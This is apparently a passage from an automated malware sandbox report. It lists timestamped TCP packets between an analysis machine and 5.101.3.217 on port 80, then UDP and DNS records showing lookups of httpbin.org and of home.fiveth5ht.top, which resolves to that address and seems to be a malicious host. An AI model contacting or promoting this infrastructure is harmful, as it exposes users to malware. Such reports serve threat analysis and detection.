                                                            Dec 27, 2024 14:53:23.704508066 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704508066 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704555035 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704648972 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704658985 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704668999 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704689980 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704703093 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704711914 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704740047 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704761982 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704804897 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704873085 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704883099 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.704921961 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.704966068 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705019951 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.705095053 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705106020 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705143929 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.705250025 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705358028 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705455065 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705498934 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705580950 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705667973 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705789089 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705827951 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705923080 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.705971003 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706060886 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706060886 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.706118107 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.706135988 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706182003 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.706218958 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706259012 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.706275940 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706315041 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.706331015 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706371069 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.706396103 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706449032 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.706528902 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.706574917 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.749504089 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.749561071 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.824145079 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824184895 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824228048 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.824234962 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824263096 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.824295044 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.824311972 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824426889 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824465990 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824523926 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824651003 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824742079 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824812889 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824853897 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.824928045 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825007915 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825023890 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825074911 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825110912 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825256109 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825267076 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825303078 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825603962 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.825613022 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825624943 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825681925 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.825710058 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825736046 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825762987 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.825794935 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.825833082 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825876951 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825886011 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.825936079 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.825956106 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.825978041 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826026917 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.826057911 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826066971 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826123953 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.826188087 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826209068 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826365948 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826414108 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826467991 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826477051 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826767921 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826781034 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826790094 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826798916 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826807976 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826817036 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826826096 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.826837063 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827003956 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827013016 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827020884 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827032089 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827243090 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827253103 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827260971 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827279091 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827323914 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827333927 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827395916 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827454090 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827533960 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827634096 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827644110 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827652931 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827737093 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827748060 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827841997 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827852964 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.827956915 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.828010082 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.828077078 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.869193077 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.944521904 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.944538116 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.944546938 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.944598913 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.944608927 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.944753885 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945229053 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945254087 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.945265055 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945334911 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:23.945348024 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945358038 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945394993 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945425987 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945555925 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945611000 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945792913 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945802927 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945811033 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945827961 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945908070 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945966959 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945976019 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.945986032 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946139097 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946147919 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946177959 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946197033 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946258068 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946300983 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946403027 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946410894 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946484089 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946494102 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946633101 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946683884 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946759939 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946805954 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946850061 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.946991920 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947010040 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947020054 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947143078 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947153091 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947202921 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947211981 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947278023 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947349072 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947359085 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947437048 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947446108 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947496891 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947555065 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947566032 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947673082 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947683096 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947751045 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947830915 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947840929 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947851896 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947943926 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.947954893 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:23.948244095 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:24.065222979 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065238953 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065248966 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065260887 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065279007 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065289021 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065298080 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065309048 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065408945 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065455914 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065540075 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065584898 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065730095 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065738916 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065768003 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065778017 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065905094 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065916061 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.065951109 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066006899 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066088915 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066106081 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066154003 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066211939 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066248894 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066349983 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066359997 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066390038 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066481113 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066493034 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066554070 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066564083 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066665888 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066677094 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066723108 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066740036 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066864014 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066880941 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066952944 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.066972017 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067018032 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067082882 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067128897 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067162037 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067249060 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067298889 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067353964 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067369938 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067470074 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067487001 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067531109 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067570925 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067670107 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067679882 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067944050 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.067966938 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068093061 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068147898 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068201065 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068326950 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068336964 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068346977 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068414927 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068424940 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068433046 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068496943 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068506002 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068514109 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068526030 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068608999 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068655968 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068732023 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068746090 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068833113 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068878889 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068974972 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.068986893 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069052935 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069089890 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069210052 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069259882 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069274902 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069283009 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069315910 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069367886 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069441080 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069498062 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069510937 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069583893 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069633007 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069662094 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069782019 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069792032 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069871902 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069890022 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:24.069931030 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:26.475286961 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:26.475413084 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:26.475481987 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:26.476855040 CET4973180192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:26.596354961 CET80497315.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:26.685375929 CET4973280192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:26.805058002 CET80497325.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:26.805393934 CET4973280192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:26.805668116 CET4973280192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:26.925148010 CET80497325.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:28.288899899 CET80497325.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:28.288937092 CET80497325.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:28.288981915 CET4973280192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:28.289263010 CET4973280192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:28.408811092 CET80497325.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:28.505006075 CET4973380192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:28.624583006 CET80497335.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:28.624778032 CET4973380192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:28.625020027 CET4973380192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:28.745315075 CET80497335.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:30.142879963 CET80497335.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:30.142921925 CET80497335.101.3.217192.168.2.4
                                                            Dec 27, 2024 14:53:30.143078089 CET4973380192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:30.143258095 CET4973380192.168.2.45.101.3.217
                                                            Dec 27, 2024 14:53:30.262666941 CET80497335.101.3.217192.168.2.4

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 27, 2024 14:53:16.167752028 CET5527353192.168.2.41.1.1.1
                                                            Dec 27, 2024 14:53:16.167824984 CET5527353192.168.2.41.1.1.1
                                                            Dec 27, 2024 14:53:16.477438927 CET53552731.1.1.1192.168.2.4
                                                            Dec 27, 2024 14:53:16.477458000 CET53552731.1.1.1192.168.2.4
                                                            Dec 27, 2024 14:53:21.575948954 CET5527653192.168.2.41.1.1.1
                                                            Dec 27, 2024 14:53:21.576014042 CET5527653192.168.2.41.1.1.1
                                                            Dec 27, 2024 14:53:22.273735046 CET53552761.1.1.1192.168.2.4
                                                            Dec 27, 2024 14:53:22.373971939 CET53552761.1.1.1192.168.2.4
                                                            Dec 27, 2024 14:53:26.546026945 CET5527853192.168.2.41.1.1.1
                                                            Dec 27, 2024 14:53:26.546087980 CET5527853192.168.2.41.1.1.1
                                                            Dec 27, 2024 14:53:26.684243917 CET53552781.1.1.1192.168.2.4
                                                            Dec 27, 2024 14:53:26.684293032 CET53552781.1.1.1192.168.2.4
                                                            Dec 27, 2024 14:53:28.366209030 CET5528053192.168.2.41.1.1.1
                                                            Dec 27, 2024 14:53:28.366209030 CET5528053192.168.2.41.1.1.1
                                                            Dec 27, 2024 14:53:28.503973007 CET53552801.1.1.1192.168.2.4
                                                            Dec 27, 2024 14:53:28.504065037 CET53552801.1.1.1192.168.2.4

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 27, 2024 14:53:16.167752028 CET192.168.2.41.1.1.10xa428Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                            Dec 27, 2024 14:53:16.167824984 CET192.168.2.41.1.1.10x3429Standard query (0)httpbin.org28IN (0x0001)false
                                                            Dec 27, 2024 14:53:21.575948954 CET192.168.2.41.1.1.10xc82bStandard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                            Dec 27, 2024 14:53:21.576014042 CET192.168.2.41.1.1.10xe984Standard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                            Dec 27, 2024 14:53:26.546026945 CET192.168.2.41.1.1.10xe998Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                            Dec 27, 2024 14:53:26.546087980 CET192.168.2.41.1.1.10x2790Standard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                            Dec 27, 2024 14:53:28.366209030 CET192.168.2.41.1.1.10x51d6Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                            Dec 27, 2024 14:53:28.366209030 CET192.168.2.41.1.1.10xf62Standard query (0)home.fiveth5ht.top28IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 27, 2024 14:53:16.477438927 CET1.1.1.1192.168.2.40xa428No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                            Dec 27, 2024 14:53:16.477438927 CET1.1.1.1192.168.2.40xa428No error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                            Dec 27, 2024 14:53:22.273735046 CET1.1.1.1192.168.2.40xc82bNo error (0)home.fiveth5ht.top5.101.3.217A (IP address)IN (0x0001)false
